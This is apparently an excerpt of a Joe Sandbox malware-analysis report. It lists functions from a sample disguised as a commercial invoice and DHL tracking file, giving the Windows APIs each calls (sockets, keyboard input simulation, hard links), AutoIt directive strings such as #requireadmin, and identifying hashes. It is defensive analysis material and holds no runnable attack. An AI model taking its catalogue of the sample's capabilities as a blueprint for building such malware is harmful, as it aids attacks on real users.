Instruction ID: e9132c83fb3f35f25914966f4fae506fc657e87e56be6179fef544e074557dbd
Opcode Fuzzy Hash: ebe137835872affc98303399ddc6e5d8b312836411a5d1748402c6a26dc5d7c1
Instruction Fuzzy Hash: 7E2162B5610245AFEB15EF68DCC1DB737ADEB5A394B050059FA0097291C771EC11CBA0

Function 012A95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 012A961D

Strings

#OnAutoItStartRegister, xrefs: 012A95F3
#notrayicon, xrefs: 012A95B7
#requireadmin, xrefs: 012A95D9

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 9bead2751db2ee6767753e52341cfe8f7c5d6b63c823e55cbf3e0afe39b6505f
Instruction ID: decbd5f791be073e3b5cbeefba0e28e98c80d0e6d4fcb47b0d498cba8d7f6127
Opcode Fuzzy Hash: 9bead2751db2ee6767753e52341cfe8f7c5d6b63c823e55cbf3e0afe39b6505f
Instruction Fuzzy Hash: 792138321302526BDB35AA2AAC02FB7779C9F65708F80442AFB8997080EB9199D1C295

Function 012D37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 012D3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 012D3850
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 012D3876

Strings

Listbox, xrefs: 012D380F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 13d82e8c47139fd71e0aeff0a5d74645d1b76d884922e8e35175846154f8331c
Instruction ID: 7572b21b1cb1f1de2ee799302347fcf93cbdd75a9d3ba58db5537c1325036395
Opcode Fuzzy Hash: 13d82e8c47139fd71e0aeff0a5d74645d1b76d884922e8e35175846154f8331c
Instruction Fuzzy Hash: 5F21B0B2620119BBEF26CE68DC45FBB376EFF89750F118114FA049B190C671DC5187A0

Function 012B49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 012B4A08
GetVolumeInformationW.KERNEL32 ref: 012B4A5C
SetErrorMode.KERNEL32(00000000,?,?,012DCC08), ref: 012B4AD0

Strings

%lu, xrefs: 012B4A6F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: d2224c061cb9955ecf222573e30615da5f5562198f38937f4eadf19515dc5e8a
Instruction ID: a9a6d9c426bbd7a3029e96c63282142277c54bcc91b272d4adf6261345f83459
Opcode Fuzzy Hash: d2224c061cb9955ecf222573e30615da5f5562198f38937f4eadf19515dc5e8a
Instruction Fuzzy Hash: 5A314171A10119AFDB14DF64C9D4EAE7BF8EF08308F144099E909DB252D771EE45CB61

Function 012D41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 012D424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 012D4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 012D4271

Strings

msctls_trackbar32, xrefs: 012D4226

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: fdae3318122cdbf45e02fbd053175e84c15b3e5faff84a751b6b2440a7fbb64a
Instruction ID: c49aa5cbf3f33329fbb9b80fbe449af6270ed1bc0c963969dbcab099ae35a436
Opcode Fuzzy Hash: fdae3318122cdbf45e02fbd053175e84c15b3e5faff84a751b6b2440a7fbb64a
Instruction Fuzzy Hash: 9F110631250249BEEF216E39CC0AFBB3BACEF85B54F010114FB55E2090D271D811CB10

Function 012A2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 01246B57: _wcslen.LIBCMT ref: 01246B6A

Part of subcall function 012A2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 012A2DC5
Part of subcall function 012A2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 012A2DD6
Part of subcall function 012A2DA7: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 012A2DDD
Part of subcall function 012A2DA7: AttachThreadInput.USER32(00000000,?,00000000), ref: 012A2DE4

GetFocus.USER32 ref: 012A2F78

Part of subcall function 012A2DEE: GetParent.USER32(00000000), ref: 012A2DF9

GetClassNameW.USER32(?,?,00000100), ref: 012A2FC3
EnumChildWindows.USER32 ref: 012A2FEB

Strings

%s%d, xrefs: 012A2FFF

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 2678d0965f1ea8fe3856fc6301b3530ee56cfe7be1df0a0b9f92db9f63a04e9f
Instruction ID: 00e11669d3b8afcc7104f6106c72f5dc0901a02353cd7c699d01b923d5b5cea6
Opcode Fuzzy Hash: 2678d0965f1ea8fe3856fc6301b3530ee56cfe7be1df0a0b9f92db9f63a04e9f
Instruction Fuzzy Hash: 9311D671610206ABDF14BF74DC88EFD776AAFA4304F444079EE09AB281DE309945CBB0

Function 012D5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 012D58C1
SetMenuItemInfoW.USER32 ref: 012D58EE
DrawMenuBar.USER32 ref: 012D58FD

Strings

0, xrefs: 012D588F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 8562261b693a85db20ba01a5ae6f2bde089aad37c080008a97b61b48ffd2e8cf
Instruction ID: 8bbe8be240cd914e9798e5ac46de698e5d686cbfbbebb703b47ef52d63de433b
Opcode Fuzzy Hash: 8562261b693a85db20ba01a5ae6f2bde089aad37c080008a97b61b48ffd2e8cf
Instruction Fuzzy Hash: C501C031520209AFDB219F15E848BEEBBB8FF46760F008099E948D6140DBB08A90DF61

Function 0129D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0129D3BF
FreeLibrary.KERNEL32 ref: 0129D3E5

Strings

X64, xrefs: 0129D2A8
GetSystemWow64DirectoryW, xrefs: 0129D3B9

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: c6596990ed2755425a128d22c37da89715600809edb1b32e7c6d105b74af55d8
Instruction ID: 15364f91001dff321316dae3061b51097b051afa4cd967eac623c35cf35c68e1
Opcode Fuzzy Hash: c6596990ed2755425a128d22c37da89715600809edb1b32e7c6d105b74af55d8
Instruction Fuzzy Hash: 72F05561C3571B8BEF795BBCCC4D8693614BF00722B80868DE603E108ACBB0C981DA44

Function 012A007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff8364d809d6f249cc6c3ef1315105bc2177cbec7c4efbc51d317924f207c6cd
Instruction ID: 5cdb31b7525fc92369e373f971f4a724f09be01a6e39601a3ac70d9a3043beeb
Opcode Fuzzy Hash: ff8364d809d6f249cc6c3ef1315105bc2177cbec7c4efbc51d317924f207c6cd
Instruction Fuzzy Hash: 3AC16A75A1020AEFDB14CFA8C894AAEBBB5FF48304F508598F505EB251D771EE81CB94

Function 012C342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 012C3459
CoUninitialize.OLE32 ref: 012C3463
VariantInit.OLEAUT32(?), ref: 012C346E
VariantClear.OLEAUT32(?), ref: 012C371B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: b6cc70ca36fa45f52ac8af0749454a797bbd8c73767c33a8208d8e2f488045d1
Instruction ID: e68aa03076f031d60bc755f356d1d76bb134a4c62fe852f7a3bca2ff7cd232c7
Opcode Fuzzy Hash: b6cc70ca36fa45f52ac8af0749454a797bbd8c73767c33a8208d8e2f488045d1
Instruction Fuzzy Hash: 0DA158756243129FC715DF28D484A2ABBE5FF98B10F04895DEA8A9B361DB30ED01CB91

Function 012A0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000), ref: 012A05F0
CoTaskMemFree.OLE32(00000000), ref: 012A0608
CLSIDFromProgID.OLE32(?,?), ref: 012A062D
_memcmp.LIBVCRUNTIME ref: 012A064E

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: fd1a49370ce63161fd762e88f4c6bae5fe19e61d32d996afab010a4080ecd374
Instruction ID: eda4cc63b5b68ff60af9fc563bfe6615d41f9f20330d36ef53e339671e41ff77
Opcode Fuzzy Hash: fd1a49370ce63161fd762e88f4c6bae5fe19e61d32d996afab010a4080ecd374
Instruction Fuzzy Hash: 67811C71A1010AEFCB04DF98C984DEEB7B9FF89315F204558F616AB250DB71AE06CB64

Function 01281391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 012814C0

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 758d5c71bc60e428e4bd1cd753dd2418321bce479b5d5c95aa85edaf0261a6e9
Instruction ID: 315153f8b52c7afebf5632c5d23c1cc260feeeda4b30ecc7c299590e8e854715
Opcode Fuzzy Hash: 758d5c71bc60e428e4bd1cd753dd2418321bce479b5d5c95aa85edaf0261a6e9
Instruction Fuzzy Hash: 41413B31A32203AFEF217BFC9C45ABF3AA8EF55370F184215F519961D0E67484A24671

Function 012D6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00A45150,?), ref: 012D62E2
ScreenToClient.USER32(?,?), ref: 012D6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 012D6382

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: cbd815cc6d0638295468af2b95a8ddb1ad3dbf67d2f75550a9a76bd5f0e5fb70
Instruction ID: 3171c365529b8a67536b91cdf1824b604c80587ec1b2cfb197df0739d12b0af6
Opcode Fuzzy Hash: cbd815cc6d0638295468af2b95a8ddb1ad3dbf67d2f75550a9a76bd5f0e5fb70
Instruction Fuzzy Hash: 6F519174A1020AEFDF25CF68D8849AE7BB6FF45760F108259FA1597291DB30E941CF90

Function 012C1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 012C1AFD
WSAGetLastError.WSOCK32 ref: 012C1B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 012C1B8A
WSAGetLastError.WSOCK32 ref: 012C1B94

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 3004c898f20f326a6867ee0ed30c71857104834de7b753cf266e91ca7e10a934
Instruction ID: 639313ff75d57d954577aa33bfb7646a71df312827fd384bf0430733d8eaec31
Opcode Fuzzy Hash: 3004c898f20f326a6867ee0ed30c71857104834de7b753cf266e91ca7e10a934
Instruction Fuzzy Hash: 1A41C234610202AFE724AF24D886F357BE4EB54B18F54854CEA1A9F3D2E772DD52CB90

Function 0127B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab13575bd1bc99a9f853cf4f3ff6588cdad7b069a31e4e4eaf9da461e3b0e7e9
Instruction ID: 272ca08ed2c23daa40500b66bd389e6c68b6d6f0da74005d365df12bd76b05be
Opcode Fuzzy Hash: ab13575bd1bc99a9f853cf4f3ff6588cdad7b069a31e4e4eaf9da461e3b0e7e9
Instruction Fuzzy Hash: 0F410672A20305AFD724AF38CC65B6BBBF9EB98710F10452AE141DB2C0D67195518780

Function 012B56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 012B5783
GetLastError.KERNEL32(?,00000000), ref: 012B57A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 012B57CE
CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 012B57FA

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 05d3eca7ee898c261cbd9e8877db658691a6bd02878e99c487347d8cc977d3b2
Instruction ID: 2617f907c946f6b39fd440a98c62860abbce176aeaf9055680c68b75b5bcf21a
Opcode Fuzzy Hash: 05d3eca7ee898c261cbd9e8877db658691a6bd02878e99c487347d8cc977d3b2
Instruction Fuzzy Hash: D0415E35610612DFCB15DF15D184A6EBBE1EF99320B198888ED5AAF361CB34FD40CB91

Function 0127D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,01266D71,00000000,00000000,012682D9,?,012682D9,?,00000001,01266D71,8BE85006,00000001,012682D9,012682D9), ref: 0127D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0127D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0127D9AB
__freea.LIBCMT ref: 0127D9B4

Part of subcall function 01273820: RtlAllocateHeap.NTDLL(00000000,?,01311444,?,0125FDF5,?,?,0124A976,00000010,01311440,012413FC,?,012413C6,?,01241129), ref: 01273852

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 39cf4fe265f6c911e760059182dd291ec40404f498d70116bbcd523f18c888b1
Instruction ID: a4fde85e265dab376d7f80ec286f1c9cc6117a9c9334cd480cc7462f3bf41e9e
Opcode Fuzzy Hash: 39cf4fe265f6c911e760059182dd291ec40404f498d70116bbcd523f18c888b1
Instruction Fuzzy Hash: E331AE72A2021BEBDB25DFA8DC44EAF7BA6EF41210F054268ED04D6190EB35C950CB90

Function 012AAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 012AAAAC
SetKeyboardState.USER32(00000080), ref: 012AAAC8
PostMessageW.USER32 ref: 012AAB36
SendInput.USER32(00000001,?,0000001C), ref: 012AAB88

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: da9da1174ba3d45d85378531b51daedee3312dc910efba90598c42abe8de5f76
Instruction ID: 45c114cca0dac4cb25a9307b82ce490dfb02b914efd7128c072883f5d6016070
Opcode Fuzzy Hash: da9da1174ba3d45d85378531b51daedee3312dc910efba90598c42abe8de5f76
Instruction Fuzzy Hash: A8315B30A60209AFFF35CA69C805BFA7BA6AF54310F844E5AE281931D1E3748585C7A1

Function 012D7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 012D769A
GetWindowRect.USER32(?,?), ref: 012D7710
PtInRect.USER32(?,?,012D8B89), ref: 012D7720
MessageBeep.USER32 ref: 012D778C

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: e12f591899ab5fe694587329808f467f44db57577b3d8a354908223816b57777
Instruction ID: 86b0a9d18541ad7af50ee590e8a703bae27057c78d1896868b045901cb252e76
